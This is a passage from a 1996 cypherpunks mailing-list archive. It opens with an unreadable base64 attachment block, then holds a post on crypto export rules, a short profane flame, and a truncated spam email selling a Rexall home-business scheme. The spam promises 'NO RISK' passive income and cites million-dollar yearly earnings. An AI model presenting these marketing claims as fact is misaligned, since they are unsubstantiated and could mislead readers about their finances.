ciEkVkAjTWxLaWJZI2hLIwpgZUIjU1YtJTNoKDZWM1glUEtDYVlxMDZhIjkn
OUVMamZWUFJZUFNGJG0yK0szW0lRRXBEKkAzUTBOISRlVjJhCmNNJFYpJ0kp
IllFWTYnKCUkYDkpZVlVNjhATExCSSkhaSwsU0U4WWNZJWgyUzFwQSM2UERh
YlFLVEY2JiosUEMKVjVxQlMkQDFtMk1QSC1JQzJIVkMtNmlYSDhNYGoxaTFL
VCIkMk5CYTVGVDFhMDZgZG1YOFlRTixWVlRAbTYiQAopaUswJjBOTmMrW0ZS
M2VHJE1OUSdNcUdaUEAxLSRNKUpOYDlmQWwqazk2KSQlW2U4RjRMbUs1MCQq
bCRtMik1CnIpZVkrMiRKTlU2UDI1UEgiTkxQZGJxJ2hhZHIxTSgoMWBaJ2Rm
MCsxTGJFIlYtYVhsNGJFa0U5QyEtQyJiYjYKLCtQcVpwR2BWWSwiVUVYMXFw
VVQxMitiJipCUTQiVEZMVFpiVTUkJzgyVkIhcGEzbDMrNkhlYWhVVmtATFtG
NQpTOTI2MDQrWlZURzUsSSdQJ1QhbVNBUSFrZFZhKUYiTUU1ZTEqUSEnUVlw
cEdVOEJZbWxFa0dVRDI2MCpTM2lUCmBUMi1hWUBJTihkViVQMWVwa2RALTkz
LGtoVCgpU2BmMiVLRU5EZkRaWiRlU2pURyYmTSQxQlEnUzAzKy1hYnEKRzFa
KWkwQEI1YWtoMVBVOS1QW1I2VEw4IlpTRVRUNUlMQCNDIUM4JmVrZlRtRURN
bGUzUUw0S1BHRyRmcEhZKwpUKCo2KjVLRC1DQSRtVS1pTUpmYGRUQiFxJTZi
cTkiSkFxKEBaVDFjUiooamZVRDBkbExhcEhWSVA4IlRxJmxmClViMEg4IWgm
cDAkbUlrZGVRI1NtQWQqISFmW1ZwcmAhMjFWIitjUyFVKFRlcElrRHBVI0xB
LSwsbGVMLEFTaWAKQSc4UjVqME1lZVtrcCdYay0jNlhRQ1ZIa0lQazJwKyhy
ISFmWTlYYCtAOGtNSUVpOTlqRzBLa3BFZDAnMig5NgpmcEhbUDlDWjZJVURY
KGpyZVUmVmVNKDJhVmVrcGUwSGhTUSorLFFoSFYmTENrUktpLWonQkdERmBC
Q0MxUXAsClNgTUgwSmhacks2UmYyIihZYWAlSXJgIjVgcm0hcDlEKigkU1ZL
SSRYWzVoYnJgI2tRW1hhYFQ5cFYxImIhJSYKLUkhSWBQQEtEWGNATWs0S2I1
bGhkWEcrWFIhLVUqZTFacDhCNThZTCdxayI4WikxNExCYiJQZChiVk1icCxC
cQoiK1MpajFCZlVxKzJgVE5IMjVmZVtkVlg1YUJoJGpQMi0yY1VGMGBoSjVN
KyNFIlVQQzVLWUtsYitUKmNFUVYtCjNBNWA4QUFVLDgiSkNqKUNyIUlAZmVx
W0VpOGEtbUZlZDgkLWkiJitrQGQxVkIkKzU1SSIqW1ZUa3E5NikiMzUKYU0z
bGZwSFY5NCwjZCVNJEZDcCYrcVtbODZLIlElVUlDMVlxZURjJkZtLUApNWRR
VCdhbDgqIiZwJ2EjTkxtRQprJ3I1TWhMWGZNLTY5NjVVNkJWQmZWSEpxYShh
LCNNI0JTUSlqNkRpJiw2KWpJUWRkWUBUaVtLYTBLNCtUalAoCmlMWGopUGZq
S0JkVEgtTFlAKltZRFZlUClxaDNgWE1JajksYScyZkVSaWxkImwzQydqWWo5
KlZmZVg2anArJzYKJSxOKWtAVWhrNFFBMEU2WzVkLVQsaiwhJ20zQUUwaFZh
RmtAQkxVJDJFRGAyYVUiUVokcVAtU1lKRVhaY2pHRQplKlRIckRKZk4pMlso
Wzk2NVBFaGhbUCYtTiEjLSlQUSImSjZCaFQ2TEFOSGxJRFNLbGhqW0FVZThS
QHI1UkBLCjQwTFNmUkRmZEpkJ0RKS2BlVGZBMiQnMWEmbGRxTjMhJWYhcTks
MSptM2BxIUtCWWNiJUVDVVVOK2oqLENRWjEKaScyS2NMQSRjSTlsQyNHRDlg
bTZHRygxSmtlKChCUUEoNlFAOVlyWE1UMyIxcEFNTTZAY01STkdrKFNpUVRL
SQoraDJZQVFhJUJNOEpoUHFoNSdyYlVhJykxOChIWG1BYCJDQWwnVmlWQVAq
cTA2Sk5DY0lDSUFwRDhxKWZwcGtaCkxSKmRFQms5UE1xM1sqbSItU201NlFE
cCMpS1FhK1ZoMFVbRDMhK1NHRClpMktgaExCYUwxNlY5J05OKihFKGYKMGFy
ZCQhVktTI0knQkAiNU1JQ2xKcTQyVCVTRWFBZVpEJXBRSCVZYVtMJGlMNmg4
KWJoVmstUiQ5YGliSyxAJwpKWWVWTVIxUjRoaW1FRFhjMiVDZWBmKCxOZlgw
LGVtWGFOYVFhJFo1NTVEZklZWUxMSy0hMVBxS1tAJSpaRFtLCjlsMUUyLGQ1
Y0g5NllUOTQyaTkqR005VTFCWGNSVUlhVktFMFU2VURqRlJIWyJWTVZALUlD
KUM5WjMjSEFWM2gKJkY1YlhLJ0sqZFNLZkAyI3JjWEdyQVZAUFIlQ0xGLVZo
akpESyxUQCxHJnIlUSVYJUZORUQnVlonY2plbSpjVQpTImxkWk1OJVsiSiYy
ZUxSbStLS2pNJCkkUiNoVUU5U0MnTEg5U2JBYmskVDk4bTVjLVhgJ3FVaGs5
Q0tsNTRKCmxrQVVyJFRwSlMjLGxHVUxlNDQxYEAxJU5NMlZFWzRraUZCMSRh
TVZqI0wpWC0zYEdCcVpQVVIrYmIlUzZHNFMKRWRSTmFkSjUxMTNiIzkhOSlr
OGNgU2NAbUdFSTFVKWhIa1QnVCZZZlNVQDlSQGVKJGhsOFZFJ204LSIiJ1Uh
bQpUWzVbTDEhUVBRLWYnUCNESGo0QCVtNDgsQ0xtSUEtZUFmW0dlR0tRMGw4
UlA0NDQtY0taLUJjSy1SS0JaKGEpCmJFS3JacjFZMiRMKUZJS2ltNChYcE1W
ZFVNJUJAJ0ctTSsiZCZxRHFQLEJOTmAtTTMrakAtWUYkWEkrWGZUKWgKcEAw
Ki0qJ2VgYDhKbEFVUEgoLCFUbSM5ZCJxR1VUYFIlaUMqIktGNHBBTGwnYlJs
OSdYakNiMCUiay0wazZEKwpUVFBJSmNgUi1AQEZBaFlEcmtkWmE1SjVqJ2Ms
SUFRZlRsJC1WLSVxZEdEVFI0KiZaYCJWKmRDbC1ZTDgwTEklClpZazNCZitr
WXBsRjlYLUVKSiZFKSwjWHBNUyNZa2spNSk2M1VgWyU2RjQ2LFgsQ1ZFZTky
IyNjLVRjLDgqbTAKTk5YYEhyUDkrMilUI05oJjklcmRVK2pAcShQQUpQTDAr
UWkiJ0JmVVghIWRiZitrIi05S1tUJSokckZWK2lMJgpTKjVNJ3BVaCRUUmQm
KjEqQiZDJm00NFBCayRtK1tMUGsxRERwUzQ0UyNgKWsoNmVraFU2UikwMCco
VnArWExYCk5NIVliUmNwSEdGRVFZQmZbVkRWTmNmJlpYWlpwcmAjWS0oWDgp
QkQ4LEs5KkMySCZZW2JyY1NRQ0tpOWxoIicKVG1VKktHLFVgWjFSRWJwSUs5
MzFZcEhqVWlVVihBSUFUOThKK1lCRzJwSWs5UUJKOSkmY1lBIyMjNEVBcCtR
YAplWUhyYVUiOCFsOU0oMmhmZW1rUUwmZlllVTBLZlNjIzMhKkIiWzFpVi1g
QUtCQDhVNlVUJjFCUzgtQiJkMmFwCkhBamQsIiFBOCEocWxOISRrbGRmYFEl
R1EiQ2BHMExyVlk4QzJkOExMYyRpQjBCLTA5J2UyckNsJE5IZEkkJ2UKWi1D
JmVyYCQtJiwpSjJHIStORGZoVHBsMGo4aWxgaDFFNSglYURJaVUjQGJOaVQ0
QmtgRklLUFEpWEVyTTgtSQpEQDMlKFInWWtrRjNFMicwJEhLakVUaUNZVmYm
M2JoQloySkNgazROIioxTFI1ZSgwTEstIzMhVlUwKyFgaycrCigscFhkNigm
QiFLUVpEUDQ1YFYiQkotNFZENCMscVtScVAxUjNQJk4zZmJsKGVrWkRiRGIt
USslM2RkaFZBaTgKMDBKZVtFLTMyQWplSkprTTEzQDFQYCFEWjktTkpZM1Ek
QzVtTE1TSEJJJHIrTSFpWCJCREFbQnFbK05tNFYpaQpLS0JAImZZMzhkIzVS
YTkmUTJoRFphTSUpNlAwS2JkJ1hhS2pYWWFAUytCQSE5TkxiLSEzNkBIaVZg
REZpU1lLCkErK0BmYzhjRElgUSo4SU05WFEpbTUhcSkhRWQrR01AQmMlYWlb
I2gnKU0pRVs5IWE5W2lKMHIxWTZNI2RYQDkKSlZMYWJLWWArNjVCIyY0R0Zi
MGYwQ0YoWCc1R0VIOWtRWGtoZShqOSFCQilIRkBxIXBHVWxpOU4iVGg5JzZx
Iwo0UEFqZSkyY0ZlOU5VVFpFWWswMzEqOUVKIShlclAzZCZYLCdKWjZEVWgr
VkUycVAhQk1MJVg1MGJVJHFZIkJsCiY2YUIpYlQ0NUdMWjkkOWppUCdaQXFS
VmVZMyVmMU0icVZFbVU4I0dSMy1qZSZHJnBVU04sakBBaVFENGUqIkUKNVhh
YTYkWmotUlslRWhWNCQ2NikiRThoVCxhUiU0YCtiSkZqZFVOQHElVGxrKSoy
aUJsQVMkVDQkNSdoUFs5IQprOWRTakFka1pLJllhOGlhUVk4MGFrcEdrW0tA
ay1oM3ArRiJhYCNaU1VjIyEtYXJacHBVVENaQk1sMXJWcCswCmlFI21kSk0o
W0dVIkxGaycrLFAmVTJgQCVhLXIjZUtLTXBsWzZWI0YmNFpENDVwY2VVTEkn
WygrQkJKKWUnUEYKWjYrWilrbScnOFJDWnJCcktiaSQjU05RQWFYU0VAWSZh
JCwiS0MqJzFKJkkwcSZxZCcwYE0rSmI1S2NIYWhxOQpEY2ZMaVtwKHBSNish
IUFBVm0rakRtakUxcFRgTGNqLGw5bTNxUW02RiJaOSRASTFTVXImNjAyTCdO
RUdNSFVZCmVWZEZEVChOQyhGUWNgQHBBM2FRNWZbNVNhKlFOIXFlNisnLSsh
SVkkSFFCVStpbSdlWkIrJVVBZCUlcWkyTiIKNjUqMyEhR2NJMDROQCUkLEkr
anEhVEEpU1hFQ1RGRS0ta1ZiTGZlI0JOISFQSzJESm05MEUoWGpsbCFlRCdI
OAoiJSZsciEnRE0xViQoSyRLSy1VLShEaC01IjhjIkwqbUdOISFSKyRTRHAs
MCZgcS0mIlFHW2BTTDMhLGlyS044CmkqWFRYYiswVU5obCg1KFEnOSlOIUg4
JktUQjhhaUklZHEqRylOW1BkMUVUQEZpOVJHQSgrUzBWaFY1RjJRcUwKYGpC
VkxxVFU4S2lkMGpOTWAtMkw1MFJORTVgVEEjY2lhYGVQI2xRVlhbTGEiUmRa
MDFwNDlqJ2JVVU4kbClyNQpUMWJkRElTWShbSCUhM0pkWiRbWzQlQCg5QGMl
LUlNOUY4QTJGJDZUbSsySzQ5KCxEVFlQUCVKWEVbWkUsWlo4CmVITEglITJY
cGNkVURWZFtBNUs4I2ZhaFQ0WSlVTkwnUUtYWy0kZlMyJTNBTCNtSlgxQFE1
SkApazlAbSwmNS0KaVhHYURZQlZTY2YtaUgtQSVAOGpGOShjK0hjI0pxJUZF
YUAsYXEqYCcxTU1AQCZGaU5BUGM4bFBNKSprQHBkcgpbNVJMSSJTWjArJEtq
MiFhYk1DcFFVVVRWQys5YUhLWSdwUSQrRU5EalY4OWlMWFpxUmBUQUptM2Rt
QEA1JlNUCmlLUEMnMkFbamQ1VkprJ3ByS2tsOE05LVYmVFNsLUsqMWpAcXJI
TnEtS1tEaSExWnAxKicwTUJtZVpZIzY0alYKa0hbOVUtQCJTYlEwYGEoLVpQ
VTlbIkRwZVY0aUwlSk5YWWw4W2EtIVlIcmMhVlNMYjY1ZilqOWJoWDBEVjhI
Jwo2RE1UU0wiWTMkSktgJDlFKjk0RlpMcUc5NWEraURpYyVxW2s5MTBsRWVH
QjBjOVpGJkRYYlIlLSNCUkQ2K0dxCkNIcCIrNSdNcXJZa3BHa2VxKWBxQiVG
UzJGZVFtRWBwTiotSFNZSGVHMTIpVEQpNk1AY04oS2giTVNJJUJKNTUKJmFW
VSMsJGVqclBqZThqKWUiIWIoaDZkVVlFQ0toW20hUGhVazQtTmRUJ1BZWSRB
I2EiKmxFOShTSFJsRWVsWQpJREpCcClHRUEqWDZbOUdscEROaFJbQTFZQmFp
RHE5MFgoIyxVS0VUNVowRmRKJkQoITRKITFqWkhQK2YmK2BxCiMwTlohMDlB
VDZMIyFTLGpMNWZqUywkTGhaQSdQYUZkZTMiYDMhNWg1Uyg2I1BYWExLQypT
Y2hUWWBQYShsNW0KKzNsWUxCcm0hVkBQNTQ1Q0VLcEdZR1ttITFRUiE4WWwz
RjEwWkVrOSRIaHBrUU1kREknJVBQRDRMQGgwQWhDUwpgIyxRUEJDWyVaals2
KyJWYXInU2omWE0iayclK2xBayNMOSlENDNoQEopVCIqKSEwJihSWzhQUihk
WFZaIlMyCixWOGZLTjltOEJCQ0spJEZYOSdLbWtkUiNGRUgqIWBGRzk4ck1A
QlEtTm1WcStFIUhrWS1GMippNUNMRUBbRHAKIlMrQmZJa1JMTkwwSGNEazlE
bVltUyNZRlgwaydtNmFGM1hNQGpTWTZZa3JiVXAiaU1WKFBqVkNbaHBJI1Rx
YgpMaTlGNkhgYlZOZCZwWTJBcVAsQm1AKFpNJUpxR0BpcFI5UjBZNDUxNTRg
YCshVUhZKFMiVishYnBFTWJVYSRICiVBa0RRYFMoJDVRRDI4UDVEW01IZkZb
bSFIbGVRUGQxYkwzWyNqQmo1J2w5ZUM4YSVHZDBNOVZRMGVYVFtoVVQKKSlG
YXFiSFlRVCNONVo1KWIwQig4ZCwqYGlBWjBbK01RYG1VJVBIQig1VUBhWjhA
TkxQJCRGSkQ4MFAlSkFrJgooJlgsciEiUzIlJjhOMVknNmlYLTJVZTBLZVk1
UTlUKjViQGo1WVhhQFEzKEM2TFNjKktRWWRAcDRgZExpUiEjCi1NOCNNKmYk
YGYhJ0NVNjRqWDFwSkUhRytTWVNRI1VNQkhJKURYRVBFaE1ZVDlkbCwrLGpJ
ViJZM3FLaCdSUSsKVDlRRyZLRSkjM0VEJ1g5YTFFYVhDKWg1cERSJ2JMLCJi
JVJsMFVhWEssWkBCbGU1IylqJ2spaGRscGtVRkAwVQpYZEFsMlZkJEEwIyMr
ayVGYylyW1k5ZC1aMy1aaGhJZVVKSiNyajkwNlZbZGtIW002ZiEpMShEQUBo
LUMsKGk5ClsyQ0lKQ01gaS1gIiJxYWhUKmwtbSdOYWRTUEglcSdZbDBQaDBJ
NnEobTI5RjEiRGFrOWNDbUw1U1lMSmo1ImQKYG0qOU5mRVorYnImMkNrOW04
ZFhGSiEwRTBtJzlaakFFQkxNLSRgWSpoJU1hZjNHcVlGR1ZqMjVMZksybDFI
YgpYMSFMcVBjSydQWCNKbDlQMmwzcSlYOUEkRSNySFtVMiU1LTJLW1VhQiFG
UyZJJltFU1pmLTNocVYqcjFVQlNoCitmNGNiRDROJ2UwRllBNnFQSEE4SkVH
VXAiK05IRHBYLWBYSGFkcGtSJSMhNCxGQCYhQjNBISZKREVgM1BNZlkKNTUo
SllLJydMNCxBKSooRUY4Q1ArWGA4KzMkcmlQVmViKyopZSFaI0hlJWFMISxG
YiUlcEdHRDNrOVQmJyskMgphIlhUajVEakxUYiVAMSFEckQySFppZWEnVmNA
IiwnYFs1SmNaRy1xZSoqK2ItMSJIKVAiOTkiY1Joa0VGKEdpCkJBSDVgTTBZ
MWpUJkspIjJMJTVlSkRFQktiLU4zJk44RUxUMHFMTDNoaUhBUFFIM1FiJDk5
VHBLJjQ5OFpIRWkKcCs2RjFNbSwkI2NBWTYxJ2ojYiREcDROMUtYJi1MI2kq
VTFBLWFYYk5SQTY2ZVttIVI5cScqMSghQGZAZTVIKQosK0hVKEVpOSJbQ2Qz
QExGRjQpW0VWbSswNDUibGUzNWEmWTJSOWJWUEBlbGRLQygzLGVEISRWOCUn
W1A5YiNoCmAmQkA2MScxa05mVTBaS1NLZFgsTkkxVSdrOEBVJTZYJWEtKUIt
MyRJW0BHYWQqNHFZWmVZS0BTUCIrUWZwKVoKKWFoWjFLclY2M0ctJU5VLUgy
RERFIkZENShMYC1VQ1YqMTE4a2xBWVM0QGNNRkEmS1VUaFZqbGxCQjFkK2lL
NApkZVY5SGJyJWZpYWBQKkErViolSSNqMGIhMGM5amE4UEMnLVVCbSosRElb
OSxUR0VHMElqSUFxRyYpUUZmMVA1CkQrYkUjckBaRGsxVlNSYSUxcUspa1hE
QTYzJCtHMmBUbCwiUkBpMjBoVEcwITNLKVVOQCtkQ2wlYEpqcUFAZSoKVFNs
MkYjWSxMQjVVbWBkVDRMQiNgKms5SC1ZJUMjYUUnZSY0VTRqSkBTR0tCa2w5
SSM5ZGJEaFNYQXI1YVNFUQpoREpGNEs0KSciQUFiZFRjJ0syazlBLEtsVTZb
NFlWRCZQJ2RCYyhtMCFaYlNGYVQzay1NIS1KJk1GSmwlZVpYCjZLQGwmTWpJ
MU5aLWlJUmNDNEhlRzEyLEhRRm1TSGRDbCtFSUNYMVtjVlJJWWtyVjQlZidO
SikxaSY4ISJxVU0KY1VrKigjZWxoa3FBaTlBZWZxR0BLJFRyMDgkRk5RTEIp
YExxKWlbZHIxWShLIkRlbGhsOEtgQStFbExpWzZjJApYVCNOMEJwSUFiVUZa
JDQnTFU5WDQ0WiVOYktMMyEhW0lWMy1GVGhxZCQ0LUMnOCFEJjBJTThjVU1B
U0UrYCtOCk05W1kiR3JNNFtYbTVoWTRKYigxQWs2Jm1xRjhUYGVqJ0JKVUVF
aFRNYC1DMkRJS3E4RlRhWDNociEqYTYsUyoKbUM5S1JENEpkTUxwWVY4ZE1k
TGVJKytAMyEtVVZQJ0ErW0RUQlInWDBIUWU2UiZZTilZJDkoJCFQYzhhKSZN
LApVRWtBVEEmKWhLQUJkQyVjJCNQSjJIVTZMMVQmWiVDUWFBTDVrWWZTZjRj
LGIla1BaWStxKEtNMCwrbEZKJmUyClZqOGBKWFhhWlQhZmhUQGFOS1JLUkdG
QFBjQzMsSWVTcCo2Jk1lakVRYVQ5IWtiNiVVLFVaUC01NFFjIURySHAKSTFU
WVRNVDAoWDkkaVhWLUVAMCxYNEoiRS1FaltaTWNUcFAkQ0NKWlFmUDNRTUA1
KC1aSmwjTkZVKDhFLWlrJgpAbTNEQGZVRDVVM1BxMyVmLDhDMiNUTCo4RDgi
MEs0MiNkQmRtZWxlTnIpMk1BNlZpM2ExRSdiWEdrW0tLJ1NFCjlVYyFpTUxI
JkJYM2lkWmRHbGtZSW0rZGYiYUZBJS0wJjIibFpwRDhATkMyQ0YpUkpEZWxM
U0pUMTVaYSlmVEoKbTBlKCswMmJTJ0UkQVpgJkwwTCtSaiZkSzlMcSdVI0BB
UERObW1FNFozNWBZQE4iQ1ArWi1YTGtNQUhQcSxgWgpJKyNMaFlxcDImSkQl
LDBRKFJbM1hMRWhoU2tBI2I0MEJLS21EJE5NamJoa0xVYUMwVUopVSxAZjMh
MDlYZWVwCmhJbVUpUDROKihASmhbSTFERyNZOCpxMUJMZEJMQWw0VjJSQE1x
K2JDWEJoMlFZVDMhW0VqOWQzNGM2Q2pWa2UKIlkkQmUpaGNIR0hVVSotTGtm
WzZFSkEjKkgrQmU4OGZNIidDVSdgJyNQYWRgIUFOa2VwLHBSbSomSywsTjgj
YApBNDBrQSxQODNgSmotZEFYcmBLKSkmNEclQGBka2RtLSE2TmRZRVRBSCg0
ai0xKFlCQGQwQTFGVCwyVElbQVJACmZxUlNgYVQqOCE2K0NtM1EoIlgjR0dH
VURTSmBxKCMlaCNNRmRZaUgzIS1kTk1WRkcsZCxhNkwiOEglS0UxRysKZUEz
cVBkVWlZYSU1NSYzR1ZmVmpjbEVpOFIiNGNYR0ZlcFVlUStSNiRqJUJoTmgw
QklmY2lOISNHUEo4ayJWZgpWVGFBSE1SYzA4YydOUkBUYUpDSzgxWUFCQiVa
MEdEbDI0YCRoITQiMycqWDFlLVMmKGZZMXJWbUQhYGxVSkxZCm1VQlM4R0Zl
WGg2aCs1NEUnTiEiZihaQEAwRyM2ZlNWYEpMSlVacXIsRFBtLEApWEUhckRo
U1lqZThoLCJYZlkKYkQzWlojSEBHbTYjLE1FRiVlOSQmZFlUcExaYUhpcmEo
bGVHIlkmbUlmJioyVDIoayNGJCNCbTUqNSxAMjlEQwpIJmlNZlhUcTkkYXBJ
S3FlJ2lJbSFMcixxWUZja0FEM2JpMVpJYUI1RTAobFpFUVRWJic4QitmaEFQ
ZlQ5YEltCiFwU0JScWsrSGJJYSpbbFRyQFRbU2VEWEJCQywpMlskaFpFUXBE
ZEUoJzQoUEVoVSNgcm0hJ0lpTXA5VExJaVMKVSwrVmkyLCUmMUoyYSlWVHEm
QDBsVHEmNDJbSTJxUCFTR00hW1Q0IWZyYCIrKExmcUdBTXEnSUwyaFNTUilS
KwpwbHIoZWtyVjNjWTlkW1pSaVFLZmtxWmVDcDAiJSQpSFksbUMnKCknUVNT
ZVpSYCYjaU1xKTJsU1MmKjQ5J0RpClRgbWlbS2RYOU4hI2EnUlJxMEMyZiNh
Vmk2Zk1xSzVMYFIiM0ExOCFKQXIxWWgwciRyYCEobFFbUkEhW3IhKGgKYFJy
Y2NyYCIwRzgoREQxQWFBTklCOUxiMTRla2VDTiJWVnJhQytsQS1jVUxZIWRO
MUNiYDNkKDJLRS00RThxSApwMHJtITFKbTlsa3IjWFIzRDYtcjJLUkNHUSpt
U2s4aVYkUXBgJlY4UkZJJXJwM1YyQk1COUAsWE5kTTJCViRaCiYwS0IkW2RT
NCVCLSFpWzZNJ3JgaklBSFBWSWFEVihLJzVmLW0qQ1ZDZnEhY2RAbTljVTJL
NWgkSG1SYXJUNksKclhlUipNcStTIlFgYEdJR1hFRWRZYUAkKSJqLE1jZFRq
LGxUclpkKk1yRzJjckRYUlkjWistWUxtJFFaSSRaMQplKVg0Sig1YTRGUVFp
cShxR0UjRXBrNWljaCJyR0FwK2tYLWZwLWlqYTUlITVra1VgKmRla3E5JGIt
J2UmW0FWCm1rMU5wcTJpZFlWVClLcSIiJChTWXBHREhpOEhqQlNHRDVCNmhU
MmxlMG0mbFVJJUlbNTUoTC1TQzNUWkBZUScKU1s0K1MzOWshTUhlLCRsYmRq
MlosckdyQmRQKDVaJmYoQitTJ0JqUDIzajZEUUEhKEJxZFIkMGBUYUY5S0ly
YwoiNUdJcGlOcSFUW2AkcmAiaXElcnIhK1osclYmLVpKUXJhQk5NaXJgYDNA
cVIrVnA0VnE5QDRGOGBALTBTbUEhCjMkRmhJLHFZSTBbbSFhNG1rMmlBWnJg
IWstUFNqU3AyVEZBJS0rYyMtQlAsTkEhNTMhIjAnWzBIMDlMQidyYCQKNVgm
YGxyYCJTYXJoJEBkSnBrMmlNcGtqZllkOEhLYSRMRjFYITUrOGpLWlVZSW1E
WDVFLTgrLVNlayRFZXJgJApFNSxLcm1ESXIhIWRlYGhaMHJIKGswOFUzITJF
J1EhYSU2W2xrIk1bNiVCWiNxOGMqcTBDW0tybSFbMmJValttCiFIMkFSOGZO
S2RmYzhpSSc0WEs5UUEqRTMrRCs1QDAjOENZJFhZQ3IjSGptVUQ1SWxpW2Ew
NkM0KFg2JEYtU1oKOClrZCtRJ0gqVkMnIWxkYVFySyRpOWZBaDJhUyxZJDBr
LWNhVksrQnErbDNSQmtwTTVNZkdgSSUxJ0ZARDE4JQppMHAwR0tWW0BiYTJx
bDJtIWhVQTBsanJaUnBEWSZBJk5SKmYoLGExJzQ4QlNiJXAnQTg5JUJiMUAy
YSlqJSMoCkUwNWs2aFBxMCRpSXIhMFIqbTY4VDM5UCk2R0AtVFNsYkBYI2VY
ZVBrTFNiYGpWTDYzZUYycHAociEtUVtCVnEKLUlBNVRQViZYcSRAOGgmaFtb
RVk1a0VLRS02UCJZcVAyLTJZcktVKmZOcUlsZTlEKVo2Q1AqcSVpTGpaTVJy
JAo1WyVGMmErQWJgMG1VaFopa2RSUXFlbTQ5U1lZTmpGMlAxLWk0YSs1R2ok
SyghKmRYKyRRaUdNQlAsMktSOChVCkRxTmNJYGFySChrZExpWXJaSlZWYVhq
Q3AtRDhiSkEwW1BBU2kzY1VTRGBrTmw5MUlFbUloVlVHSVI5KGA5RzAKMmBY
bShgRikoZGYtLUdscms5VVgsYSQiWyMnTFFMTiZLR1VxNnBJTjJkVkFGI3Jt
IUNUcSFyNVpBK1tDZEJwKApkaCFIZDEmQCcqNk1GLSwjZUxpVWglRklpRmJQ
QGFIJypyUFAocERxQjNIa1thJjNJaGtQaVNrUCpkSTVCWixCCjQpIyVhUSZZ
SUNUNHJAUGhkciNxKWRYcStgaEYiQyJyQFhCW20wW2xlOWlSaElQcWVDKTli
QmZpW2EmTWlOTiMKVDArRUszQSdSamVLLTYkTGpUaE5SOFEzUlFqS3JAWSdy
bThyJXJbNWwmcmxjMnJIckhaWyVZKCpQRVhjbU5DOQpWQ0lLQmVJS0xVbFgi
SURaNXFxUmFyRjk4UWtJaFVZaylNYigmQkczIW1iQGZTZiQnQkZyciEqSzZy
TFYrKGhECipgZmlUKiRhMEcmTGllQiE2M1lSZFhBJ1lAVitYNi1aRyZlcnEp
K2MlMm1IJHFwcWFUVEwyaWM4TSwrNjJycFIKMCIhISE6Cg==
--Boundary..3948.1071713642.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 17 Nov 1996 08:29:35 -0800 (PST)
To: jer+@andrew.cmu.edu (Jeremiah A Blatz)
Subject: Re: "Strong" crypto and export rule changes.
In-Reply-To: <0mXaQD200YUf13OMA0@andrew.cmu.edu>
Message-ID: <199611171626.LAA02780@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Jeremiah A Blatz wrote:
| Adam Shostack <adam@homeport.org> writes:
| >         What the US government will allow to be exported is not "strong
| > encryption."  It is encryption only slightly too strong to be broken
| > by an amateur effort.  For the right investment in custom hardware, it
| > falls quickly.  (500,000 $US = 3.5 hour avg break).
| <snip>
| >         In other words, the surveilance state is still winning, and
| > American business is still losing.
| 
| Umm, I'm not expert, but it seems to me that the proposal removes the
| "munitions" classification. It seems the USG has removed its defense
| in court chanllenges to export restrictions. Am I totally off-base
| here?

	No, but they were going to lose in court anyway.  They're
losing in the marketplace, and they throw us a bone.  We don't want
bones, we want a full lifting of the restrictions.

	We want to stop wasting time on these silly fights, and start
selling things on the net.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 17 Nov 1996 08:32:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Final Solution to the Crypto Problem
In-Reply-To: <1.5.4.32.19961117011708.007245d0@pop.pipeline.com>
Message-ID: <56nek9$ig0@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Cpunks has become an existance proof that the benefits of anarchy are
not worth the price.  Aga, Vultis, it's a damned shame your parents
didn't teach you not to shit where you live.
-- 
  ``I tell you, we are here on earth to fart around, and don't let anybody
tell you any different.''
	Kurt Vonnegut, quoted in Harpers (11-95)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Jackson" <John.Jackson@orci.com>
Date: Sun, 17 Nov 1996 14:04:59 -0800 (PST)
To: jjackso9@rocky.orci.com
Subject: ALERT!  123,000 announced job cuts
Message-ID: <199611171940.MAA04675@rocky.orci.com>
MIME-Version: 1.0
Content-Type: text/plain


         DOWNSIZED? - RIGHTSIZED? - RESTRUCTURED?
HOW CAN YOU PROTECT YOURSELF FROM THIS EVERYDAY OCCURRENCE?

--->               AT&T  =  123,000 announced job cuts
--->      GENERAL MOTORS =  122,000 announced job cuts
--->               IBM   =  400,000 announced job cuts 
--->    JOE's PRINT SHOP =  2 announced job cuts

Are you dodging the arrows of Corporate America?

Do you know someone (a family member, a friend, maybe even yourself)
who has lost a job during the past six months? Has this person secured
another job that is paying the same salary and benefits as the job
they lost?

There was once a time when people held a job for 20 to 30 years and
retired with a secure pension.  Those days are gone!  So what can the
average person do to protect him or herself financially in the
unfortunate, but all too common, event of losing a job?

Financial advisors have been telling us for years that we should
diversify our investments.  If this concept makes sense, should we not
also diversify our sources of INCOME?  Does it make sense to leave
yourself vulnerable by expecting all of your income to come from one
source?

Rexall, an international company that was founded in 1903, is
flourishing today as a very successful publicly traded company.  You
have no doubt heard of Rexall and are familiar with the more than
7,000 Rexall drug stores around the country.  In fact, more than 87%
of adult Americans today recognize the name Rexall and associate it
with trust and integrity.  Rexall's six divisions are all very
profitable and growing at staggering rates.  

So what does this have to do with you?

Rexall has developed an entrepreneurial arm of its company that helps
individuals build a substantial secondary income stream without the
hassles of ordinary business.  No huge investments, no inventory, no
employees, NO RISK.  This is not some fly-by- night operation.  This
is REXALL!  One of the most well known and respected corporate names
in America.

My partner, Todd Smith, has helped hundreds of people diversify their
income and create substantial passive income streams through the
entrepreneurial arm of the Rexall Companies.  Todd himself has earned
over one million dollars in EACH of the last three years in this
simple, no-stress, home-based business.  He knows what he is doing and
how to help point people, like you, in the right direction.  

If you would like to learn how we can help you create a financial
hedge against a possible downturn in your present employment, or
simply to develop an additional source of passive income, call me
today.  Todd has created an informational audio tape that explains our
entire business and how you can participate in it.

If you are making all the money you want, have your retirement
completely paid for, enjoy your job and can see working it until you
retire, then CONGRATULATIONS.  You are one-in-a-thousand.  On the
other hand, if you are like most Americans that are not happy with
their current financial situation, it would be worth the phone call
and some time listening to Todd's tape.  What have you got to lose? 
If you DON'T call, you have a lot to lose.

Call (303)-480-5841 right now and ask for this free tape to be rushed
to you without any obligation whatsoever.

PS:  The message on this Tape is timely, addresses the societal and
economic forces that WILL change our lives in the coming new century,
